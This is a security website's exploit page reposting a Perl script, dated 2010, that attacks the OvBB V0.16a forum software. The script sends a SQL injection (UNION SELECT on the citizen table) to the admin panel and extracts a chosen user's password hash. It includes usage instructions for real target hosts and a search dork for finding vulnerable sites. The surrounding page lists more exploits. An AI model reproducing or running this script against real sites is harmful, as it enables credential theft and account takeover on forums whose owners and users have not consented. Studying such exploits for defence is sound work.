首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 OvBB V0.16a Forum Remote SQL Injection Exploit 来源：www.sec4ever.com 作者：indoushka 发布时间：2010-09-26   #!/usr/bin/perl -w # # OvBB V0.16a Forum Remote SQL Injection Exploit # # Found & Coded: indoushka # # Date: 25/07/2010 # # Home: www.sec4ever.com # # Dz-Ghost Team ===== Saoucha * Star08 * Cyber Sec * theblind74 * XproratiX * onurozkan * n2n * Meher Assel # special thanks to : r0073r (inj3ct0r.com) * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller # Sid3^effects * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net # MR.SoOoFe * ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH # # Download : http://www.ovbb.org/ use IO::Socket; print q{ ####################################################################### #         OvBB V0.16a Remote SQL Injection Exploit                    # #                      By indoushka                                   # #                     www.iq-ty.com/vb                                # #               Dz-Ghost Team  (00213771818860)                       # #           Algeria Hackerz (indoushka@hotmail.com)                   # #                  Dork: Powered by OvBB V0.16a                       #            ####################################################################### ************************************************************************ 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0     _                   __           __       __                     1 1   /' \            __  /'__`\        /\ \__  /'__`\                   0 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1 1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1 1                  \ \____/ >> Exploit database separated by exploit   0 0                   \/___/          type (local, remote, DoS, etc.)    1 1                                                                      1 0  [+] Site            : Inj3ct0r.com                                  0 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1 0                                                                      0 1                    #######################################           1 0                    I'm indoushka member from Inj3ct0r Team           1 1                    #######################################           0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 }; if (!$ARGV[2]) { print q{ Usage: perl  OvBB.pl host /directory/ victim_userid        perl  OvBB.pl www.Target.com /forum/ 1 }; } $server = $ARGV[0]; $dir    = $ARGV[1]; $user   = $ARGV[2]; $myuser = $ARGV[3]; $mypass = $ARGV[4]; $myid   = $ARGV[5]; print "------------------------------------------------------------------------------------------------\r\n"; print "[>] SERVER: $server\r\n"; print "[>]    DIR: $dir\r\n"; print "[>] USERID: $user\r\n"; print "------------------------------------------------------------------------------------------------\r\n\r\n"; $server =~ s/(http:\/\/)//eg; $path  = $dir; $path .= "admincp.php?section=smilies&action=edit&smilieid=1')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20citizen%20WHERE%20(uid= '".$username ; print "[~] PREPARE TO CONNECT...\r\n"; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED"; print "[+] CONNECTED\r\n"; print "[~] SENDING QUERY...\r\n"; print $socket "GET $path HTTP/1.1\r\n"; print $socket "Host: $server\r\n"; print $socket "Accept: */*\r\n"; print $socket "Connection: close\r\n\r\n"; print "[+] DONE!\r\n\r\n"; print "--[ REPORT ]------------------------------------------------------------------------------------\r\n"; while ($answer = <$socket>) { if ($answer =~/(\w{32})/) {   if ($1 ne 0) {    print "Password is: ".$1."\r\n"; print "--------------------------------------------------------------------------------------\r\n";       } exit(); } } print "------------------------------------------------------------------------------------------------\r\n";   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·TRAIDNT UP Version 3.0 Remote ·VirIT eXplorer Lite DLL Hijack ·Windows Mobile 6.5 TR (WinCE 5 ·Embarcadero Delphi XE (2011) D ·Zenphoto Config Update and Com ·E-Xoopport - Samsara <= v3.1 ( ·Microsoft Cinepak Codec CVDeco ·Mozilla Firefox CSS font-face ·BS.Player 2.56 (Build 1043) .m ·VMware Workstation <= 7.1.1 VM ·Gokhun ASP Stok v1.0 Multiple ·MP3 Player Utilities 3.57 (AMV   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved